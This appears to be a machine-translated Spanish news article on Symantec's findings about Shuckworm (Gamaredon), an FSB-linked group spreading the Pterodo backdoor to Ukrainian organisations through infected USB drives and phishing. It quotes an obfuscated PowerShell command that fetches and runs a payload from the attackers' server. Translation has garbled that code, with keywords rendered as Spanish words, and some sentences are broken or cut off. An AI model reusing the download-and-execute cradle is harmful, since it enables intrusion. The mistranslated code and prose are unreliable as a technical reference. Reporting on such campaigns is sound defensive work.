imágenes falsas
Los piratas informáticos que trabajan para el Servicio de Seguridad Federal de Rusia han montado múltiples ataques cibernéticos que utilizaron malware basado en USB para robar grandes cantidades de datos de objetivos ucranianos para usarlos en su invasión en curso de su vecino más pequeño, dijeron los investigadores.
“Los sectores y la naturaleza de las organizaciones y máquinas objetivo pueden haber dado a los atacantes acceso a cantidades significativas de información confidencial”, escribieron investigadores de Symantec, ahora propiedad de Broadcom, en una publicación del jueves. “Hubo indicios en algunas organizaciones de que los atacantes estaban en las máquinas de los departamentos de recursos humanos de las organizaciones, lo que indica que la información sobre las personas que trabajan en las diversas organizaciones era una prioridad para los atacantes, entre otras cosas”.
El grupo, que Symantec rastrea como Shuckworm y otros investigadores llaman Gamaredon y Armageddon, ha estado activo desde 2014 y ha estado vinculado al FSB de Rusia, el principal servicio de seguridad de ese país. El grupo se enfoca únicamente en obtener inteligencia sobre objetivos ucranianos. En 2020, los investigadores de la firma de seguridad SentinelOne dicho
En febrero, Shuckworm comenzó a implementar una nueva infraestructura de comando y control de malware que ha penetrado con éxito las defensas de múltiples organizaciones ucranianas en el ejército, los servicios de seguridad y el gobierno de ese país. Los miembros del grupo parecen más interesados en obtener información relacionada con información militar confidencial que podría ser objeto de abuso en la invasión en curso de Rusia.
Esta nueva campaña presentó un nuevo malware en forma de un script de PowerShell que propaga Pterodo, una puerta trasera creada por Shuckworm. El script se activa cuando las unidades USB infectadas se conectan a las computadoras objetivo. El script malicioso primero se copia a sí mismo en la máquina de destino para crear un archivo de acceso directo con la extensión rtf.lnk. Los archivos tienen nombres como video_porn.rtf.lnk, no_eliminar.rtf.lnk y evidencia.rtf.lnk. Los nombres, que en su mayoría están en ucraniano, son un intento de atraer a los objetivos para que abran los archivos para que instalen Pterodo en las máquinas.
El script continúa enumerando todas las unidades conectadas a la computadora de destino y se copia a sí mismo en todas las unidades extraíbles adjuntas, muy probablemente con la esperanza de infectar cualquier dispositivo con espacio de aire, que intencionalmente no está conectado a Internet en un intento de evitar que siendo hackeado
Para cubrir sus huellas, Shuckworm ha creado docenas de variantes y ha rotado rápidamente las direcciones IP y la infraestructura que usa para comando y control. El grupo también utiliza servicios legítimos como Telegram y su plataforma de microblogging Telegraph para comando y control en otro intento de evitar la detección.
Shuckworm generalmente usa correos electrónicos de phishing como un vector inicial en las computadoras de los objetivos. Los correos electrónicos contienen archivos adjuntos maliciosos que se hacen pasar por archivos con extensiones, incluidas .docx, .rar, .sfx, lnk y hta. Los correos electrónicos a menudo usan temas como conflictos armados, procesos penales, lucha contra el crimen y protección de los niños como señuelos para lograr que los objetivos abran los correos electrónicos y hagan clic en los archivos adjuntos.
Los investigadores de Symantec dijeron que una computadora infectada que recuperaron en la campaña era típica por la forma en que funciona. Ellos escribieron:
En una víctima, la primera señal de actividad maliciosa fue cuando el usuario pareció abrir un archivo RAR que probablemente se entregó a través de un correo electrónico de phishing y que contenía un documento malicioso.
Después de abrir el documento, se observó que se ejecutaba un comando malicioso de PowerShell para descargar la carga útil de la siguiente etapa del servidor C&C de los atacantes:
“CSIDL_SYSTEM\cmd.exe” /c inicio /min “” powershell -w oculto
“$gt=”/obtener.”+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servidorcertificadovalidaciónllamadab
ack={$true};$tos+=’.vafikgo.’;$tos+=[char](57+57);$hosta+=[char](
60+57);$direcciones=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
lista de vestidos[0];$cliente=(nuevo-objeto
net.webclient);$faddr=”htt”+’ps://’+$addr+$gt;$text=$client.descargas
tring($faddr);iex $texto”Más recientemente, Symantec ha observado que Shuckworm aprovecha más direcciones IP en sus scripts de PowerShell. Este es probablemente un intento de evadir algunos métodos de seguimiento empleados por los investigadores.
Shuckworm también continúa actualizando las técnicas de ofuscación utilizadas en sus scripts de PowerShell en un intento de evitar la detección, con hasta 25 nuevas variantes de los scripts del grupo observadas por mes entre enero y abril de 2023.
La publicación del jueves incluye direcciones IP, hash, nombres de archivos y otros indicadores de compromiso que las personas pueden usar para detectar si han sido atacados. La publicación también advierte que el grupo representa una amenaza que los objetivos deben tomar en serio.
“Esta actividad demuestra que el enfoque implacable de Shuckworm en Ucrania continúa”, escribieron. “Parece claro que los grupos de ataque respaldados por el estado-nación ruso continúan apuntando con láser a los objetivos ucranianos en un intento de encontrar datos que puedan ayudar a sus operaciones militares”.